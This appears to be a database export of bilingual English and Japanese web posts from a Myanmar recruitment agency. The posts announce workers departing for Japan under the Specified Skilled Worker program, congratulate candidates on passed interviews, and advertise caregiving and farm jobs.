('activities', 0, 157, 615, 'en', 0, '<p data-path-to-node=\"2\">On April 26, 2026, New Comet Agency proudly bid farewell to a group of nine talented candidates as they departed for Japan. They will be working in the restaurant and food service industry under the Specified Skilled Worker (Tokutei Ginou) program.</p><p data-path-to-node=\"3\">The departing candidates are:</p><ul data-path-to-node=\"4\"><li><p data-path-to-node=\"4,0,0\">Hnin Su Hlaing</p></li><li><p data-path-to-node=\"4,1,0\">Ei Thandar Naing</p></li><li><p data-path-to-node=\"4,2,0\">Hnin Eaindray Phyo</p></li><li><p data-path-to-node=\"4,3,0\">Pyae Pyae Phyo</p></li><li><p data-path-to-node=\"4,4,0\">Khaing Shwe Syn Soe</p></li><li><p data-path-to-node=\"4,5,0\">Nwe Nwe Khaing</p></li><li><p data-path-to-node=\"4,6,0\">Yadana Lwin</p></li><li><p data-path-to-node=\"4,7,0\">Zin Mon Myat</p></li><li><p data-path-to-node=\"4,8,0\">Wai Mon Thant</p></li></ul><p data-path-to-node=\"5\">The entire team at New Comet Agency wishes them a safe flight and great success in their new careers. We are confident that they will excel in their work in Japan and make their families proud. Congratulations!</p><img src=\"/sites/default/files/inline-images/0-02-06-6bc017149a9c7874b366c76ecb6ef5710b9df983ea90aa778ccb8853375afe9d_22683ea0d5a.jpg\" data-entity-uuid=\"76aa84f2-d49b-4dda-843b-31ab9da86af3\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-06-48cfc583aa8d8d586c04213d5c19bacd33da2460dd554ef5253d9e3aeb7c4d2d_22683ead90b.jpg\" data-entity-uuid=\"ed345dd8-a182-4bfc-a9d2-03fec09b6c9e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-b14bdc8b45008df92a86cbb501f8e473f4f7a08433c3fc9289dce6f86474c1f4_22683e8176a.jpg\" data-entity-uuid=\"c50c2499-ad3f-4392-9c32-c0620ce45716\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-faef4433d60de7c7c609e3e09fed101395e5407311e4bbc4e0f50e58289fa580_22683ea3f7a.jpg\" data-entity-uuid=\"3662bc11-1345-4c3a-8860-99cb9fd86368\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 157, 615, 'ja', 0, '<p>2026年4月26日、当機関（New Comet Agency）を通じて採用された9名の候補生が、特定技能（外食業）の資格で日本へ向けて出発いたしました。</p><p>出発した候補生は以下の通りです：</p><ul><li>Hnin Su Hlaing さん</li><li>Ei Thandar Naing さん</li><li>Hnin Eaindray Phyo さん</li><li>Pyae Pyae Phyo さん</li><li>Khaing Shwe Syn Soe さん</li><li>Nwe Nwe Khaing さん</li><li>Yadana Lwin さん</li><li>Zin Mon Myat さん</li><li>Wai Mon Thant さん</li></ul><p>彼女たちの安全なフライトと日本でのご活躍、そしてご家族の誇りとなるような素晴らしいキャリアを築かれることをスタッフ一同、心よりお祈り申し上げます。</p><img src=\"/sites/default/files/inline-images/0-02-06-6bc017149a9c7874b366c76ecb6ef5710b9df983ea90aa778ccb8853375afe9d_22683ea0d5a.jpg\" data-entity-uuid=\"76aa84f2-d49b-4dda-843b-31ab9da86af3\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-06-48cfc583aa8d8d586c04213d5c19bacd33da2460dd554ef5253d9e3aeb7c4d2d_22683ead90b.jpg\" data-entity-uuid=\"ed345dd8-a182-4bfc-a9d2-03fec09b6c9e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-b14bdc8b45008df92a86cbb501f8e473f4f7a08433c3fc9289dce6f86474c1f4_22683e8176a.jpg\" data-entity-uuid=\"c50c2499-ad3f-4392-9c32-c0620ce45716\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-faef4433d60de7c7c609e3e09fed101395e5407311e4bbc4e0f50e58289fa580_22683ea3f7a.jpg\" data-entity-uuid=\"3662bc11-1345-4c3a-8860-99cb9fd86368\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 160, 660, 'en', 0, '<p><strong>A New Step Toward a Career in Japan</strong></p><p>New Comet Trading Agency is proud to announce that Ms. Toe Toe Hlaing has successfully passed the interview for a Specified Skilled Worker (Tokutei Ginou – Food Service) position in Japan.</p><p>Her success is the result of dedication, preparation, and a strong commitment to achieving her goal of working in Japan.</p><p>We would like to extend our heartfelt congratulations on this achievement and wish her continued success throughout the upcoming procedures and her future career in Japan.</p><p>New Comet Trading Agency remains dedicated to connecting qualified Myanmar candidates with rewarding employment opportunities in Japan.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-Gaishoku-Toe-Toe-Hlaing%20%283-2-2026%29.jpg\" data-entity-uuid=\"31db132d-6f42-4390-832c-4f4f7eb9c73c\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 160, 660, 'ja', 0, '<p data-start=\"1078\" data-end=\"1095\"><strong data-start=\"1078\" data-end=\"1095\">日本でのキャリアへの第一歩</strong></p><p data-start=\"1097\" data-end=\"1172\">ニューコメット・トレーディング・エージェンシーは、TOE TOE HLAING さんが特定技能（外食業）の採用面接に合格されたことをご報告いたします。</p><p data-start=\"1174\" data-end=\"1226\">今回の合格は、ご本人の努力と熱心な準備の成果であり、日本で働くという目標に向けた大きな一歩となりました。</p><p data-start=\"1228\" data-end=\"1278\">この素晴らしい成果を心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1280\" data-end=\"1344\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材と日本企業をつなぐ架け橋として支援を続けてまいります。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-Gaishoku-Toe-Toe-Hlaing%20%283-2-2026%29.jpg\" data-entity-uuid=\"31db132d-6f42-4390-832c-4f4f7eb9c73c\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 659, 'en', 0, '<p data-start=\"266\" data-end=\"300\"><strong data-start=\"266\" data-end=\"300\">Interview Success Announcement</strong></p><p data-start=\"302\" data-end=\"495\">New Comet Trading Agency is pleased to announce that Ms. Myat Thandar Kyaw has successfully passed the interview for a Specified Skilled Worker (Tokutei Ginou – Food Service) position in Japan.</p><p data-start=\"497\" data-end=\"635\">This achievement reflects her dedication, preparation, and determination to pursue a professional career in Japan\'s food service industry.</p><p data-start=\"637\" data-end=\"780\">We sincerely congratulate her on this important milestone and wish her continued success in the upcoming procedures and future career in Japan.</p><p data-start=\"782\" data-end=\"948\">New Comet Trading Agency remains committed to supporting and preparing candidates for employment opportunities in Japan through our recruitment and training programs.</p><p data-start=\"950\" data-end=\"1004\">Congratulations and best wishes for the journey ahead.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 161, 659, 'ja', 0, '<p data-start=\"1162\" data-end=\"1175\"><strong data-start=\"1162\" data-end=\"1175\">面接合格のお知らせ</strong></p><p data-start=\"1177\" data-end=\"1256\">ニューコメット・トレーディング・エージェンシーは、MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1258\" data-end=\"1314\">このたびの合格は、ご本人の努力と熱心な準備の成果であり、日本での外食業界でのキャリアへの大きな第一歩となります。</p><p data-start=\"1316\" data-end=\"1356\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1358\" data-end=\"1415\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の育成と日本就職支援に努めてまいります。</p><p data-start=\"1417\" data-end=\"1447\">おめでとうございます。今後のさらなるご成功を願っております。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw%283-2-26%29_0.jpg\" data-entity-uuid=\"02d5ed4e-00e0-46e9-8048-5921d2b292da\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 162, 625, 'en', 0, '<p data-start=\"381\" data-end=\"447\"><strong data-start=\"381\" data-end=\"447\">Specified Skilled Worker (Kaigo) – Home Care Position in Japan</strong></p><p data-start=\"449\" data-end=\"603\">New Comet Trading Agency is pleased to introduce an exciting employment opportunity for qualified caregivers seeking to build a long-term career in Japan.</p><p data-start=\"605\" data-end=\"915\">Unlike conventional nursing home or care facility positions, this Home Care (訪問介護) role involves providing direct care and support to elderly individuals in their own homes. This profession is highly respected in Japan and offers a rewarding opportunity to make a meaningful difference in people\'s daily lives.</p><p data-start=\"917\" data-end=\"964\"><strong data-start=\"917\" data-end=\"933\">Job Location</strong><br>Aichi Prefecture (Nagoya Area)</p><p data-start=\"966\" data-end=\"990\"><strong data-start=\"966\" data-end=\"990\">Job Responsibilities</strong></p><p data-start=\"992\" data-end=\"1247\">• Meal preparation and assistance with daily nutrition<br>• Bathing and personal care support<br>• Assistance with walking and wheelchair mobility<br>• Housekeeping, laundry, and shopping support<br>• Accompanying clients to hospitals and medical appointments</p><p data-start=\"1249\" data-end=\"1272\"><strong data-start=\"1249\" data-end=\"1272\">Salary and Benefits</strong></p><p data-start=\"1274\" data-end=\"1530\">• Basic Salary: 210,000 Yen per month<br>• Expected Monthly Income: Approximately 230,000 Yen or more including overtime and bonuses<br>• Housing Cost: Approximately 35,000 Yen per month<br>• Days Off: Two days per week<br>• Working Hours: Shift-based schedule</p><p data-start=\"1532\" data-end=\"1548\"><strong data-start=\"1532\" data-end=\"1548\">Requirements</strong></p><p data-start=\"1550\" data-end=\"1725\">• JLPT N2 Certificate<br>• Tokutei Ginou Kaigo Certificate<br>• Strong commitment to building a long-term career in Japan<br>• Responsible, patient, and compassionate personality</p><p data-start=\"1727\" data-end=\"1790\">Applicants with caregiving experience will be given preference.</p><p data-start=\"1792\" data-end=\"1889\">Interested candidates are encouraged to contact New Comet Trading Agency for further information.</p><p data-start=\"1792\" data-end=\"1889\">&nbsp;</p><img src=\"/sites/default/files/inline-images/N2%20Kaigo%20Job%20Offer.jpg\" data-entity-uuid=\"97f3d438-a4d8-4b63-8254-1477a26ce407\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 162, 625, 'ja', 0, '<p data-start=\"2051\" data-end=\"2073\"><strong data-start=\"2051\" data-end=\"2073\">特定技能（介護）訪問介護スタッフ募集</strong></p><p data-start=\"2075\" data-end=\"2145\">ニューコメット・トレーディング・エージェンシーでは、日本で長期的なキャリア形成を目指す介護人材の皆様に、訪問介護のお仕事をご紹介いたします。</p><p data-start=\"2147\" data-end=\"2224\">本求人は介護施設勤務とは異なり、ご利用者様のご自宅を訪問し、日常生活のサポートを行うお仕事です。日本社会において高く評価されている介護サービスの一つです。</p><p data-start=\"2226\" data-end=\"2233\"><strong data-start=\"2226\" data-end=\"2233\">勤務地</strong></p><p data-start=\"2235\" data-end=\"2246\">愛知県（名古屋エリア）</p><p data-start=\"2248\" data-end=\"2256\"><strong data-start=\"2248\" data-end=\"2256\">業務内容</strong></p><p data-start=\"2258\" data-end=\"2329\">• 食事の準備および介助<br>• 入浴・身体介護<br>• 歩行や車椅子移動のサポート<br>• 掃除・洗濯・買い物支援<br>• 通院時の付き添い</p><p data-start=\"2331\" data-end=\"2340\"><strong data-start=\"2331\" data-end=\"2340\">給与・待遇</strong></p><p data-start=\"2342\" data-end=\"2432\">• 基本給：210,000円／月<br>• 想定月収：230,000円以上（残業代・賞与含む）<br>• 住宅費：約35,000円／月<br>• 休日：週2日<br>• 勤務時間：シフト制</p><p data-start=\"2434\" data-end=\"2442\"><strong data-start=\"2434\" data-end=\"2442\">応募条件</strong></p><p data-start=\"2444\" data-end=\"2522\">• JLPT N2合格者<br>• 特定技能（介護）資格保持者<br>• 日本で長期的なキャリア形成を希望する方<br>• 責任感があり、思いやりを持って働ける方</p><p data-start=\"2524\" data-end=\"2538\">介護経験者は優遇いたします。</p><p data-start=\"2540\" data-end=\"2584\">詳細については、ニューコメット・トレーディング・エージェンシーまでお問い合わせください。</p><p data-start=\"1792\" data-end=\"1889\">&nbsp;</p><img src=\"/sites/default/files/inline-images/N2%20Kaigo%20Job%20Offer.jpg\" data-entity-uuid=\"97f3d438-a4d8-4b63-8254-1477a26ce407\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 163, 627, 'en', 0, '<p><strong>Specified Skilled Worker (Agriculture) Job Opportunity in Japan</strong></p><p>New Comet Trading Agency is currently recruiting candidates for an Agriculture Specified Skilled Worker (Tokutei Ginou) position in Japan.</p><p>This opportunity is suitable for individuals with agricultural experience who wish to build a long-term career in Japan.</p><p><strong>Work Location</strong></p><p>Tsukuba City, Ibaraki Prefecture, Japan</p><p><strong>Job Responsibilities</strong></p><p>• Green onion (Negi) cultivation and harvesting<br>• Agricultural production and farm management support<br>• Packing and packaging agricultural products<br>• Preparing products for shipment and distribution</p><p><strong>Salary and Benefits</strong></p><p>• Hourly Wage: ¥1,080<br>• Average Monthly Salary: ¥200,000 – ¥250,000<br>• Overtime opportunities available<br>• Potential Monthly Income: Up to approximately ¥300,000 including overtime</p><p><strong>Working Hours</strong></p><p>• Summer Season: Between 5:00 AM and 8:00 PM<br>• 8-hour shift schedule</p><p><strong>Days Off</strong></p><p>• 1 to 2 days per week</p><p><strong>Accommodation</strong></p><p>• Company housing available<br>• Housing Fee: ¥20,000 per month<br>• 1–2 persons per room<br>• Detached house accommodation<br>• Utilities paid according to actual usage</p><p><strong>Requirements</strong></p><p>• JLPT N4 or above<br>• Ability to communicate in daily Japanese conversation<br>• Agricultural work experience preferred<br>• Good physical health</p><p>Applicants with a driver\'s license will be given priority consideration.</p><p>Only six positions are available. Interested candidates are encouraged to apply as soon as possible.</p><p>For further information, please contact New Comet Trading Agency.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/16-6-2026%20-Nougyou.jpg\" data-entity-uuid=\"69bded37-a7a1-4c91-a9d2-fdf230578555\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 163, 627, 'ja', 0, '<p data-start=\"1985\" data-end=\"2006\"><strong data-start=\"1985\" data-end=\"2006\">特定技能（農業）求人募集のお知らせ</strong></p><p data-start=\"2008\" data-end=\"2071\">ニューコメット・トレーディング・エージェンシーでは、日本で長期的に働きたい方を対象に、特定技能（農業）人材を募集しております。</p><p data-start=\"2073\" data-end=\"2110\">農業経験を活かしながら、日本で安定したキャリアを築くことができる求人です。</p><p data-start=\"2112\" data-end=\"2119\"><strong data-start=\"2112\" data-end=\"2119\">勤務地</strong></p><p data-start=\"2121\" data-end=\"2128\">茨城県つくば市</p><p data-start=\"2130\" data-end=\"2138\"><strong data-start=\"2130\" data-end=\"2138\">業務内容</strong></p><p data-start=\"2140\" data-end=\"2193\">• ネギの栽培および収穫作業<br>• 農作物の生産管理補助<br>• 箱詰め・包装作業<br>• 出荷準備作業</p><p data-start=\"2195\" data-end=\"2204\"><strong data-start=\"2195\" data-end=\"2204\">給与・待遇</strong></p><p data-start=\"2206\" data-end=\"2280\">• 時給：1,080円<br>• 月収目安：200,000円～250,000円<br>• 残業あり<br>• 残業を含めた月収は約300,000円まで可能</p><p data-start=\"2282\" data-end=\"2290\"><strong data-start=\"2282\" data-end=\"2290\">勤務時間</strong></p><p data-start=\"2292\" data-end=\"2325\">• 夏季：午前5時から午後8時の間<br>• 実働8時間（シフト制）</p><p data-start=\"2327\" data-end=\"2333\"><strong data-start=\"2327\" data-end=\"2333\">休日</strong></p><p data-start=\"2335\" data-end=\"2343\">• 週1日～2日</p><p data-start=\"2345\" data-end=\"2351\"><strong data-start=\"2345\" data-end=\"2351\">住居</strong></p><p data-start=\"2353\" data-end=\"2415\">• 会社寮あり<br>• 寮費：月20,000円<br>• 1部屋1～2名利用<br>• 一戸建てタイプ<br>• 光熱費は実費負担</p><p data-start=\"2417\" data-end=\"2425\"><strong data-start=\"2417\" data-end=\"2425\">応募条件</strong></p><p data-start=\"2427\" data-end=\"2485\">• JLPT N4以上<br>• 日常会話レベルの日本語能力<br>• 農業経験者歓迎<br>• 健康で体力に自信のある方</p><p data-start=\"2487\" data-end=\"2506\">運転免許をお持ちの方は優遇いたします。</p><p data-start=\"2508\" data-end=\"2543\">募集人数は6名限定です。ご興味のある方はお早めにお問い合わせください。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/16-6-2026%20-Nougyou.jpg\" data-entity-uuid=\"69bded37-a7a1-4c91-a9d2-fdf230578555\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 164, 629, 'en', 0, '<p><strong>A New Chapter Begins in Japan</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Su Myat Win successfully departed for Japan on 14 June 2026 under the Specified Skilled Worker (Hotel) Program.</p><p>This marks an important milestone in her professional journey as she begins a new career in Japan\'s hospitality industry.</p><p>We extend our warmest congratulations and best wishes as she embarks on this exciting opportunity. May her experience in Japan be rewarding, successful, and filled with valuable learning opportunities.</p><p>New Comet Trading Agency remains committed to supporting Myanmar candidates in achieving their goals through international employment opportunities.</p><img src=\"/sites/default/files/inline-images/%2814-6-2026%29%20Su%20Myat%20Win%202.jpg\" data-entity-uuid=\"db69afa8-def5-40a5-9e13-4680a60442b2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 164, 629, 'ja', 0, '<p data-start=\"1107\" data-end=\"1122\"><strong data-start=\"1107\" data-end=\"1122\">日本での新たなスタート</strong></p><p data-start=\"1124\" data-end=\"1206\">ニューコメット・トレーディング・エージェンシーは、SU MYAT WIN さんが2026年6月14日に特定技能（宿泊）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1208\" data-end=\"1262\">日本の宿泊業界で新たなキャリアをスタートされることとなり、ご本人にとって大きな節目となる素晴らしい機会です。</p><p data-start=\"1264\" data-end=\"1324\">心よりお祝い申し上げるとともに、日本での生活と仕事が充実したものとなり、多くの経験と成長につながることを願っております。</p><p data-start=\"1326\" data-end=\"1379\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の海外就労を支援してまいります。</p><p data-start=\"1326\" data-end=\"1379\">&nbsp;</p><img src=\"/sites/default/files/inline-images/%2814-6-2026%29%20Su%20Myat%20Win%202.jpg\" data-entity-uuid=\"db69afa8-def5-40a5-9e13-4680a60442b2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 165, 631, 'en', 0, '<p><strong>Departure to Japan – 3 June 2026</strong></p><p>New Comet Trading Agency is pleased to announce that four candidates successfully departed for Japan on 3 June 2026 under the Specified Skilled Worker (Kaigo) Program.</p><p>The candidates are:</p><p>• Thae Su Su Aye<br>• Hnin Yu War<br>• Hsu Mon Htet<br>• Shwe Sin Win</p><p>Their departure marks an important milestone after months of preparation, training, and dedication toward building a professional career in Japan\'s caregiving sector.</p><p>We extend our sincere congratulations and wish them success, personal growth, and a rewarding experience in Japan. May they achieve their goals and contribute positively to their workplaces and communities.</p><p>New Comet Trading Agency will continue to support Myanmar workers in pursuing meaningful career opportunities abroad.</p><img src=\"/sites/default/files/inline-images/0-02-05-045c83e0dbab5edb94ed3e02d3b5408f77782f2bc938d4e38c28f1d5e9009d8d_2269c80ab27.jpg\" data-entity-uuid=\"ca3d7c09-57cf-4fd3-9715-ac05967a4311\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-498d41b52747be1914370d778c7266b2519e1c63e048d3d2dc2753b0c61bc4bc_2269c80f4a9_0.jpg\" data-entity-uuid=\"592ef76f-594f-41b3-8101-bef062e3a807\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-5783259c5cb90811be09437c6a25f6b37815d871639b109a28054b0d662b8d5e_2269c815115.jpg\" data-entity-uuid=\"3d109e78-f787-47e2-8256-b38e4d903f44\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-bce8dd32e9c08b6128802b68caada6269fa36b43398e8203c60391414268d774_2269c8083c7.jpg\" data-entity-uuid=\"5fd80362-b637-4ad6-9d68-2f9655a557d8\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-495cfd4813203e14183c65b8fc25f508ea2c4f1611b042edd313a9e2ffc86cab_2269c80aa18.jpg\" data-entity-uuid=\"02b0e92a-9f11-4c6d-8d0a-d74c1bb5130f\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 165, 631, 'ja', 0, '<p data-start=\"1210\" data-end=\"1228\"><strong data-start=\"1210\" data-end=\"1228\">2026年6月3日 日本出発</strong></p><p data-start=\"1230\" data-end=\"1296\">ニューコメット・トレーディング・エージェンシーは、以下の4名の候補者が特定技能（介護）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1298\" data-end=\"1376\">• THAE SU SU AYE さん<br>• HNIN YU WAR さん<br>• HSU MON HTET さん<br>• SHWE SIN WIN さん</p><p data-start=\"1378\" data-end=\"1432\">今回の出発は、日本での介護分野におけるキャリアを目指し、長期間にわたる準備と努力を重ねてきた成果となります。</p><p data-start=\"1434\" data-end=\"1486\">皆様の新たな挑戦を心よりお祝いするとともに、日本での生活と仕事が実り多いものとなることを願っております。</p><p data-start=\"1488\" data-end=\"1539\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材の海外就労を支援してまいります。</p><img src=\"/sites/default/files/inline-images/0-02-05-045c83e0dbab5edb94ed3e02d3b5408f77782f2bc938d4e38c28f1d5e9009d8d_2269c80ab27.jpg\" data-entity-uuid=\"ca3d7c09-57cf-4fd3-9715-ac05967a4311\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-498d41b52747be1914370d778c7266b2519e1c63e048d3d2dc2753b0c61bc4bc_2269c80f4a9_0.jpg\" data-entity-uuid=\"592ef76f-594f-41b3-8101-bef062e3a807\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-5783259c5cb90811be09437c6a25f6b37815d871639b109a28054b0d662b8d5e_2269c815115.jpg\" data-entity-uuid=\"3d109e78-f787-47e2-8256-b38e4d903f44\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-bce8dd32e9c08b6128802b68caada6269fa36b43398e8203c60391414268d774_2269c8083c7.jpg\" data-entity-uuid=\"5fd80362-b637-4ad6-9d68-2f9655a557d8\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-495cfd4813203e14183c65b8fc25f508ea2c4f1611b042edd313a9e2ffc86cab_2269c80aa18.jpg\" data-entity-uuid=\"02b0e92a-9f11-4c6d-8d0a-d74c1bb5130f\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 166, 634, 'en', 0, '<p data-start=\"247\" data-end=\"281\"><strong data-start=\"247\" data-end=\"281\">Interview Success Announcement</strong></p><p data-start=\"283\" data-end=\"450\">New Comet Trading Agency is delighted to announce that Ms. Thu Thu Aung has successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p><p data-start=\"452\" data-end=\"573\">Her achievement reflects dedication, perseverance, and thorough preparation for a career in Japan\'s hospitality industry.</p><p data-start=\"575\" data-end=\"729\">We extend our heartfelt congratulations on this important accomplishment and wish her every success in the upcoming procedures and future career in Japan.</p><p data-start=\"731\" data-end=\"822\">We look forward to seeing her begin an exciting new chapter in the Japanese hotel industry.</p><p data-start=\"824\" data-end=\"871\">Congratulations and best wishes for the future.</p>', '', 'full_html'),
('activities', 0, 166, 634, 'ja', 0, '<p data-start=\"1022\" data-end=\"1035\"><strong data-start=\"1022\" data-end=\"1035\">面接合格のお知らせ</strong></p><p data-start=\"1037\" data-end=\"1110\">ニューコメット・トレーディング・エージェンシーは、THU THU AUNG さんが特定技能（宿泊）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1112\" data-end=\"1163\">今回の合格は、ご本人の努力と継続的な学習、そして日本の宿泊業界で働くという目標に向けた熱意の成果です。</p><p data-start=\"1165\" data-end=\"1215\">この素晴らしい成果を心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1217\" data-end=\"1249\">日本での新しいキャリアが実り多いものとなることを願っております。</p><p data-start=\"1251\" data-end=\"1262\">おめでとうございます。</p>', '', 'full_html'),
('activities', 0, 167, 636, 'en', 0, '<p><strong>Departure to Japan – 23 April 2026</strong></p><p>New Comet Trading Agency is pleased to announce that the following candidates successfully departed for Japan on 23 April 2026 under the Specified Skilled Worker (Food Service) Program.</p><p>• Phoo Pwint Kyaw<br>• Ei Zin Htwe<br>• Htay Htay Khaing<br>• Mai Tandar Naing</p><p>This achievement marks the beginning of an exciting new journey as they pursue career opportunities in Japan\'s food service industry.</p><p>We wish all four candidates success in their new workplaces and hope they gain valuable experience while building a bright future in Japan.</p><p>New Comet Trading Agency remains committed to supporting Myanmar workers in achieving their professional goals through overseas employment opportunities.</p><p>&nbsp;</p><img data-entity-uuid=\"c6268691-63a4-4280-971f-f60476616ad7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%204%20person%20%2823-4-2026%29%202.jpg\">', '', 'full_html'),
('activities', 0, 167, 636, 'ja', 0, '<p data-start=\"1146\" data-end=\"1165\"><strong data-start=\"1146\" data-end=\"1165\">2026年4月23日 日本出発</strong></p><p data-start=\"1167\" data-end=\"1234\">ニューコメット・トレーディング・エージェンシーは、以下の4名の候補者が特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1236\" data-end=\"1323\">• PHOO PWINT KYAW さん<br>• EI ZIN HTWE さん<br>• HTAY HTAY KHAING さん<br>• MAI TANDAR NAING さん</p><p data-start=\"1325\" data-end=\"1354\">皆様は、日本の外食業界で新たなキャリアをスタートされます。</p><p data-start=\"1356\" data-end=\"1402\">新しい職場で多くの経験を積み、充実した生活と明るい未来を築かれることを心より願っております。</p><p data-start=\"1404\" data-end=\"1455\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材の海外就労を支援してまいります。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%204%20person%20%2823-4-2026%29%202.jpg\" data-entity-uuid=\"c6268691-63a4-4280-971f-f60476616ad7\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 168, 638, 'en', 0, '<p><strong>Interview Success in the Hospitality Sector</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Win Htet Htet Aung has successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p><p>This achievement demonstrates her commitment, preparation, and determination to pursue a professional career in Japan\'s hospitality industry.</p><p>We extend our sincere congratulations and wish her continued success throughout the upcoming procedures and her future career in Japan.</p><p>May this accomplishment serve as the beginning of a rewarding and successful journey in the Japanese hotel sector.</p>', '', 'full_html'),
('activities', 0, 168, 638, 'ja', 0, '<p data-start=\"1026\" data-end=\"1044\"><strong data-start=\"1026\" data-end=\"1044\">宿泊分野 面接合格のお知らせ</strong></p><p data-start=\"1046\" data-end=\"1125\">ニューコメット・トレーディング・エージェンシーは、WIN HTET HTET AUNG さんが特定技能（宿泊）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1127\" data-end=\"1184\">今回の合格は、ご本人の努力と熱心な準備の成果であり、日本の宿泊業界で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1186\" data-end=\"1226\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1228\" data-end=\"1269\">この素晴らしい成果が、日本での充実したキャリアの第一歩となることを願っております。</p><p data-start=\"1271\" data-end=\"1282\">おめでとうございます。</p>', '', 'full_html'),
('activities', 0, 169, 640, 'en', 0, '<p><strong>Embarking on a New Journey in Japan</strong></p><p>New Comet Trading Agency is proud to announce that the following candidates successfully departed for Japan on 10 May 2026 under the Specified Skilled Worker (Kaigo) Program.</p><p>• Thandar Moe<br>• Thet Mon Soe<br>• Mi Mi Kyaw</p><p>After completing their preparations and training, they have taken an important step toward building their careers in Japan\'s caregiving sector.</p><p>We wish them success in their new workplaces and hope they enjoy a rewarding experience while contributing their skills and dedication to the communities they serve.</p><p>May this new chapter bring personal growth, professional achievement, and a bright future ahead.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2810-5-2026%29%203%20person%20-2%20.jpg\" data-entity-uuid=\"f2947aa6-e1b8-4c14-a91e-3a2d7c90a734\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 169, 640, 'ja', 0, '<p data-start=\"1073\" data-end=\"1087\"><strong data-start=\"1073\" data-end=\"1087\">日本での新たな挑戦へ</strong></p><p data-start=\"1089\" data-end=\"1166\">ニューコメット・トレーディング・エージェンシーは、以下の3名の候補者が2026年5月10日に特定技能（介護）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1168\" data-end=\"1222\">• THANDAR MOE さん<br>• THET MON SOE さん<br>• MI MI KYAW さん</p><p data-start=\"1224\" data-end=\"1261\">皆様は研修と準備を終え、日本の介護分野で新たなキャリアをスタートされます。</p><p data-start=\"1263\" data-end=\"1305\">新しい環境の中で多くの経験を積み、成長と成功を重ねられることを心より願っております。</p><p data-start=\"1307\" data-end=\"1335\">今後のご活躍と充実した日本での生活をお祈り申し上げます。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2810-5-2026%29%203%20person%20-2%20.jpg\" data-entity-uuid=\"f2947aa6-e1b8-4c14-a91e-3a2d7c90a734\" data-entity-type=\"file\">', '', 'full_html'),
